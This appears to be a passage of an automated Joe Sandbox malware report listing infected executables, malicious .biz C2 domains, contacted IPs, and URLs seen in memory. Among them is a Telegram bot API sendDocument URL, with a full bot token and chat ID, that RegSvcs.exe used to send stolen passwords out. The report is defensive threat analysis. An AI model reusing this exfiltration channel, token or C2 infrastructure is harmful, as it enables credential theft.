                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  ww99.przvgke.biz15%VirustotalBrowse
                  ww12.przvgke.biz16%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://82.112.184.197/dtxqcr0%Avira URL Cloudsafe
                  http://18.141.10.107/40%Avira URL Cloudsafe
                  http://ww12.przvgke.biz/d100%Avira URL Cloudmalware
                  http://172.234.222.138/C0%Avira URL Cloudsafe
                  http://ww99.przvgke.biz/100%Avira URL Cloudmalware
                  http://ww99.przvgke.biz/iwsxa100%Avira URL Cloudmalware
                  http://ww12.przvgke.biz/T100%Avira URL Cloudmalware
                  http://54.244.188.177/yfypviummaqwyuq0%Avira URL Cloudsafe
                  http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662ww99.przvgke.bizc100%Avira URL Cloudmalware
                  http://ww99.przvgke.biz/7Ycs100%Avira URL Cloudmalware
                  http://54.244.188.177:80/yfypviummaqwyuq0%Avira URL Cloudsafe
                  http://44.221.84.105/gjuvotllw0%Avira URL Cloudsafe
                  http://18.141.10.107/feiwbqpqckjc0%Avira URL Cloudsafe
                  https://api.telegram0%Avira URL Cloudsafe
                  http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662100%Avira URL Cloudmalware
                  http://schemas.micrXX0%Avira URL Cloudsafe
                  http://ww12.przvgke.biz/L100%Avira URL Cloudmalware
                  http://ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334100%Avira URL Cloudmalware
                  http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTZ8fHx8fHw2NzU5NGNhZTNm100%Avira URL Cloudmalware
                  http://82.112.184.197/U0%Avira URL Cloudsafe
                  http://82.112.184.197/dtxqcr7%VirustotalBrowse
                  http://54.244.188.177/ihnlsqbtrmkahnv0%Avira URL Cloudsafe
                  http://18.141.10.107/jji0%Avira URL Cloudsafe
                  http://172.234.222.138/J0%Avira URL Cloudsafe
                  http://ww99.przvgke.biz/15%VirustotalBrowse
                  http://18.141.10.107/b0%Avira URL Cloudsafe
                  http://44.221.84.105/b0%Avira URL Cloudsafe
                  http://82.112.184.197/kdexhblwxghmjgif0%Avira URL Cloudsafe
                  http://172.234.222.138/snsobwmcccpnrm0%Avira URL Cloudsafe
                  http://172.234.222.138/U0%Avira URL Cloudsafe
                  http://82.112.184.197/kdexhblwxghmj0%Avira URL Cloudsafe
                  http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid0%Avira URL Cloudsafe
                  http://ww12.przvgke.biz/100%Avira URL Cloudmalware
                  http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU5NGNiMGMw100%Avira URL Cloudmalware
                  http://ww99.przvgke.biz/snsobwmcccpnrm100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  przvgke.biz
                  		172.234.222.138
                  		truefalse
                    		high
                    ssbzmoy.biz
                    		18.141.10.107
                    		truefalse
                      		high
                      knjghuig.biz
                      		18.141.10.107
                      		truefalse
                        		high
                        vjaxhpbji.biz
                        		82.112.184.197
                        		truefalse
                          		high
                          pywolwnvd.biz
                          		54.244.188.177
                          		truefalse
                            		high
                            reallyfreegeoip.org
                            		172.67.177.134
                            		truefalse
                              		high
                              ifsaia.biz
                              		13.251.16.150
                              		truefalse
                                		high
                                checkip.dyndns.com
                                		193.122.6.168
                                		truefalse
                                  		high
                                  cvgrf.biz
                                  		54.244.188.177
                                  		truefalse
                                    		high
                                    ww99.przvgke.biz
                                    		72.52.179.174
                                    		truefalseunknown
                                    lpuegx.biz
                                    		82.112.184.197
                                    		truefalse
                                      		high
                                      saytjshyf.biz
                                      		44.221.84.105
                                      		truefalse
                                        		high
                                        084725.parkingcrew.net
                                        		13.248.148.254
                                        		truefalse
                                          		high
                                          xlfhhhm.biz
                                          		47.129.31.212
                                          		truefalse
                                            		high
                                            fwiwk.biz
                                            		172.234.222.143
                                            		truefalse
                                              		high
                                              vcddkls.biz
                                              		18.141.10.107
                                              		truefalse
                                                		high
                                                npukfztj.biz
                                                		44.221.84.105
                                                		truefalse
                                                  		high
                                                  api.telegram.org
                                                  		149.154.167.220
                                                  		truefalse
                                                    		high
                                                    zlenh.biz
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      checkip.dyndns.org
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        uhxqin.biz
                                                        		unknown
                                                        		unknownfalse
                                                          		high
                                                          ww12.przvgke.biz
                                                          		unknown
                                                          		unknowntrueunknown
                                                          anpmnmxo.biz
                                                          		unknown
                                                          		unknownfalse
                                                            		high

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175false
                                                              		high
                                                              http://vjaxhpbji.biz/cfsmnhjmfalse
                                                                		high
                                                                http://ifsaia.biz/pnfalse
                                                                  		high
                                                                  http://saytjshyf.biz/eglmpsrvxnyxfalse
                                                                    		high
                                                                    http://npukfztj.biz/gjuvotllwfalse
                                                                      		high
                                                                      http://xlfhhhm.biz/vtfqfalse
                                                                        		high
                                                                        http://vcddkls.biz/lqpvpffalse
                                                                          		high
                                                                          http://checkip.dyndns.org/false
                                                                            		high
                                                                            http://vjaxhpbji.biz/ofalse
                                                                              		high
                                                                              http://cvgrf.biz/yfypviummaqwyuqfalse
                                                                                		high
                                                                                http://lpuegx.biz/dtxqcrfalse
                                                                                  		high
                                                                                  http://ssbzmoy.biz/jjifalse
                                                                                    		high
                                                                                    https://reallyfreegeoip.org/xml/8.46.123.175false
                                                                                      		high
                                                                                      http://pywolwnvd.biz/taohikdratudiqxkfalse
                                                                                        		high
                                                                                        http://pywolwnvd.biz/ihnlsqbtrmkahnvfalse
                                                                                          		high
                                                                                          http://knjghuig.biz/feiwbqpqckjcfalse
                                                                                            		high
                                                                                            http://przvgke.biz/iwsxafalse
                                                                                              		high
                                                                                              http://ssbzmoy.biz/xxitmchctwqmfalse
                                                                                                		high
                                                                                                http://przvgke.biz/snsobwmcccpnrmfalse
                                                                                                  		high
                                                                                                  http://lpuegx.biz/kdexhblwxghmjfalse
                                                                                                    		high

                                                                                                    URLs from Memory and Binaries

                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                    http://ww99.przvgke.biz/armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                    • 15%, Virustotal, Browse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    https://api.telegram.orgRegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://api.telegram.org/botRegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881armsvc.exe, 00000002.00000003.2776258063.00000000007C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://ww12.przvgke.biz/darmsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            http://18.141.10.107/4armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://172.234.222.138/Carmsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://18.141.10.107/armsvc.exe, 00000002.00000003.2148425780.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://82.112.184.197/dtxqcrarmsvc.exe, 00000002.00000003.2555995836.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • 7%, Virustotal, Browse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.openssl.org/support/faq.htmlofficesvcmgr.exe.2.drfalse
                                                                                                                		high
                                                                                                                http://ww99.przvgke.biz/iwsxaarmsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                http://ww12.przvgke.biz/Tarmsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithmsedge_proxy.exe.2.drfalse
                                                                                                                  		high
                                                                                                                  http://54.244.188.177/yfypviummaqwyuqarmsvc.exe, 00000002.00000003.2169195097.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662ww99.przvgke.bizcarmsvc.exe, 00000002.00000003.2288760056.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.0000000000984000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  http://ww99.przvgke.biz/7Ycsarmsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555725636.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  http://54.244.188.177:80/yfypviummaqwyuqarmsvc.exe, 00000002.00000003.2169195097.0000000000989000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://18.141.10.107/feiwbqpqckjcarmsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://checkip.dyndns.org/qRegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://44.221.84.105/gjuvotllwarmsvc.exe, 00000002.00000003.2187355202.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://api.telegramRegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.0000000000984000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787409878.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2786700530.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    		unknown
                                                                                                                    http://schemas.micrXXAppVClient.exe, 00000007.00000003.2109262975.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109012837.00000000004D6000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109493299.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000002.2110084231.00000000004F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://ww12.przvgke.biz/Larmsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    		unknown
                                                                                                                    http://www.openssl.org/support/faq.htmlerrorofficesvcmgr.exe.2.drfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000011.00000002.3380159600.0000000003321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaEofficesvcmgr.exe.2.drfalse
                                                                                                                          		high
                                                                                                                          http://54.244.188.177/armsvc.exe, 00000002.00000003.2169195097.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121242786.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2187672356.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787409878.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2786700530.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTZ8fHx8fHw2NzU5NGNhZTNmarmsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            http://82.112.184.197/Uarmsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://crash-reports.mozilla.com/submit?id=armsvc.exe, 00000002.00000003.2776140964.00000000007C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://54.244.188.177/ihnlsqbtrmkahnvarmsvc.exe, 00000002.00000003.2121150907.0000000000984000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121242786.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://pywolwnvd.biz/armsvc.exe, 00000002.00000003.2148708963.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2149018044.0000000000998000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121150907.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1armsvc.exe, 00000002.00000003.2776258063.00000000007C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://checkip.dyndns.orgRegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://18.141.10.107/jjiarmsvc.exe, 00000002.00000003.2148425780.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.autoitscript.com/autoit3/Aut2exe_x64.exe.2.drfalse
                                                                                                                                        		high
                                                                                                                                        https://pcnatrk.net/track.armsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://reallyfreegeoip.org/xml/8.46.123.175=4RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://172.234.222.138/Jarmsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://18.141.10.107/barmsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://44.221.84.105/barmsvc.exe, 00000002.00000003.2187672356.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://82.112.184.197/kdexhblwxghmjgifarmsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://172.234.222.138/snsobwmcccpnrmarmsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://reallyfreegeoip.orgRegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.winimage.com/zLibDllarmsvc.exe, 00000002.00000003.2360231003.0000000002180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://172.234.222.138/Uarmsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://82.112.184.197/kdexhblwxghmjarmsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://api.telegram.orgRegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsidofficesvcmgr.exe.2.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://ww12.przvgke.biz/armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  		unknown
                                                                                                                                                  http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU5NGNiMGMwarmsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  		unknown
                                                                                                                                                  http://ww99.przvgke.biz/snsobwmcccpnrmarmsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.000000000096D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.000000000096C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  		unknown
                                                                                                                                                  https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffmsedge_proxy.exe.2.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.bizarmsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2279735972.0000000002140000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.000000000096C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256234355.0000000002100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://82.112.184.197/armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555725636.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690542196.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787944261.0000000000984000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high

                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public IPs

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          13.248.148.254
                                                                                                                                                          		084725.parkingcrew.netUnited States
                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                          149.154.167.220
                                                                                                                                                          		api.telegram.orgUnited Kingdom
                                                                                                                                                          		62041TELEGRAMRUfalse
                                                                                                                                                          44.221.84.105
                                                                                                                                                          		saytjshyf.bizUnited States
                                                                                                                                                          		14618AMAZON-AESUSfalse
                                                                                                                                                          193.122.6.168
                                                                                                                                                          		checkip.dyndns.comUnited States
                                                                                                                                                          		31898ORACLE-BMC-31898USfalse
                                                                                                                                                          54.244.188.177
                                                                                                                                                          		pywolwnvd.bizUnited States
                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                          72.52.179.174
                                                                                                                                                          		ww99.przvgke.bizUnited States
                                                                                                                                                          		32244LIQUIDWEBUSfalse
                                                                                                                                                          13.251.16.150
                                                                                                                                                          		ifsaia.bizUnited States
                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                          47.129.31.212
                                                                                                                                                          		xlfhhhm.bizCanada
                                                                                                                                                          		34533ESAMARA-ASRUfalse
                                                                                                                                                          172.234.222.138
                                                                                                                                                          		przvgke.bizUnited States
                                                                                                                                                          		20940AKAMAI-ASN1EUfalse
                                                                                                                                                          82.112.184.197
                                                                                                                                                          		vjaxhpbji.bizRussian Federation
                                                                                                                                                          		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                          18.141.10.107
                                                                                                                                                          		ssbzmoy.bizUnited States
                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                          172.67.177.134
                                                                                                                                                          		reallyfreegeoip.orgUnited States
                                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                          Analysis ID:1572924
                                                                                                                                                          Start date and time:2024-12-11 09:25:08 +01:00
                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 12m 55s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                          Number of analysed new started processes analysed:30
                                                                                                                                                          Number of new started drivers analysed:3
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
